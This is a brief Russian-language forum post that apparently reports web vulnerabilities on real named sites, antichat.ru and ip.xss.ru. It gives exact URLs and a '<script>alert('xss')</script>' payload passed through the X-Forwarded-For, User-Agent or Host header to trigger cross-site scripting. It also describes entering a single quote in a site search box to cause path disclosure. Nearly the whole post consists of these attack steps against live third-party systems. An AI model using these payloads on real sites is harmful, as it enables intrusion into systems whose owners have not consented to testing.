Antichat

1) По адресу http://antichat.ru/util/whois/index.php передаём X-Forwarded-For: <script>alert('xss')</script> , получаем алерт

2) По адресу http://video.antichat.ru/ в поисковик вбиваем ' получаем раскрытие пути

Web-hack

1) http://ip.xss.ru/header.php аналогично передаём сюда X-Forwarded-For или User Agent или Host со значением <script>alert('xss')</script> , опять получаем алерт

__________________